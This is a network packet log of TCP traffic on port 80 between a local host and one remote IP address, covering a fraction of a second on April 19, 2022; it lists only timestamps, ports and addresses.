Apr 19, 2022 16:44:44.784622908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.784673929 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.784739017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.784836054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.784986973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.785037994 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.785096884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.785151958 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.785211086 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.785281897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.785413027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.785470009 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.785505056 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.785558939 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.785708904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.785734892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.785871029 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.785926104 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.785975933 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.786030054 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.786147118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.786216974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.786313057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.786365986 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.786490917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.786545992 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.786566973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.786670923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.786792040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.786845922 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.786889076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.786962032 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.787004948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.787141085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.787233114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.787290096 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.787378073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.787430048 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.787468910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.787625074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.787674904 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.787708044 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.787787914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.787869930 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.787942886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.788024902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.788137913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.788182020 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.788269997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.788347960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.788395882 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.788501978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.788588047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.788649082 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.788706064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.788754940 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.788811922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.788989067 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.789036989 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.789041042 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.789150953 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.789268017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.789268017 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.789383888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.789433002 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.789500952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.789628983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.789712906 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.789730072 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.789830923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.789989948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.790052891 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.790119886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.790189028 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.790194035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.790282965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.790340900 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.790395021 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.790512085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.790570021 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.790671110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.790728092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.790801048 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.790913105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.790946007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.791004896 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.791059971 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.791212082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.791279078 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.791301966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.791445971 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.791553974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.791615009 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.791640043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.791693926 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.791793108 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.791860104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.792032003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.792089939 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.792150974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.792201042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.792211056 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.792314053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.792383909 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.792418003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.792546988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.792659998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.792720079 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.792769909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.792831898 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.792870045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.792988062 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.793148994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.793200970 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.793231010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.793278933 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.793349981 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.793468952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.793581009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.793631077 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.793708086 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.793781042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.793829918 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.793941021 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.793992996 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.794028997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.794161081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.794261932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.794312954 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.794344902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.794399023 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.794486046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.794590950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.794709921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.794756889 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.794806004 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.794868946 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.794907093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.795064926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.795167923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.795216084 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.795306921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.795356035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.795388937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.795495033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.795629978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.795681000 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.795738935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.795789003 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.795912027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.795957088 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.796071053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.796118021 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.796165943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.796216965 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.796350956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.796410084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.796519041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.796566963 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.796713114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.796751976 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.796767950 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.796838999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.796976089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.797025919 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.797072887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.797132969 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.797185898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.797312975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.797450066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.797508001 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.797545910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.797602892 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.797652960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.797804117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.797869921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.797928095 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.797991037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.798048019 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.798103094 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.798221111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.798274994 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.798314095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.798432112 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.798489094 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.798554897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.798675060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.798727036 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.798793077 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.798909903 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.798999071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.799052000 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.799105883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.799165964 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.799273968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.799346924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.799452066 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.799510002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.799585104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.799647093 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.799696922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.799778938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.799854994 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.799907923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.800024986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.800149918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.800215006 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.800261974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.800316095 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.800348997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.800515890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.800651073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.800704002 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.800728083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.800780058 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.800818920 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.800951958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.801065922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.801100969 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.801196098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.801269054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.801326036 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.801431894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.801470041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.801486015 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.801673889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.801711082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.801762104 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.801872015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.801923037 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.801951885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.802071095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.802179098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.802229881 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.802283049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.802335978 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.802433968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.802529097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.802622080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.802675962 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.802748919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.802809000 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.802872896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.803033113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.803113937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.803173065 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.803208113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.803265095 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.803313971 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.803427935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.803554058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.803605080 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.803672075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.803755045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.803807020 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.803910971 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.803961039 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.803970098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.804099083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.804197073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.804255962 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.804325104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.804375887 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.804465055 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.804543972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.804667950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.804719925 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.804769993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.804825068 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.804893017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.805032969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.805191040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.805244923 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.805275917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.805330992 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.805352926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.805474997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.805593967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.805648088 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.805687904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.805748940 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.805840015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.805912018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.806031942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.806086063 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.806123972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.806180954 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.806304932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.806372881 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.806540966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.806590080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.806596041 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.806637049 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.806762934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.806830883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.806893110 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.806911945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.807059050 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.807193041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.807246923 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.807393074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.807446957 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.807640076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.807765007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.807830095 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.807871103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.807960987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.808104038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.808161974 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.808199883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.808315039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.808357000 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.808434010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.808553934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.808607101 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.808659077 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.808717966 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.808832884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.808952093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.809066057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.809123993 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.809195042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.809230089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.809266090 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.809354067 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.809406042 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.809438944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.809596062 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.809667110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.809719086 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.809875011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.809926033 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.809935093 CEST	80	49758	45.135.48.153	192.168.2.4
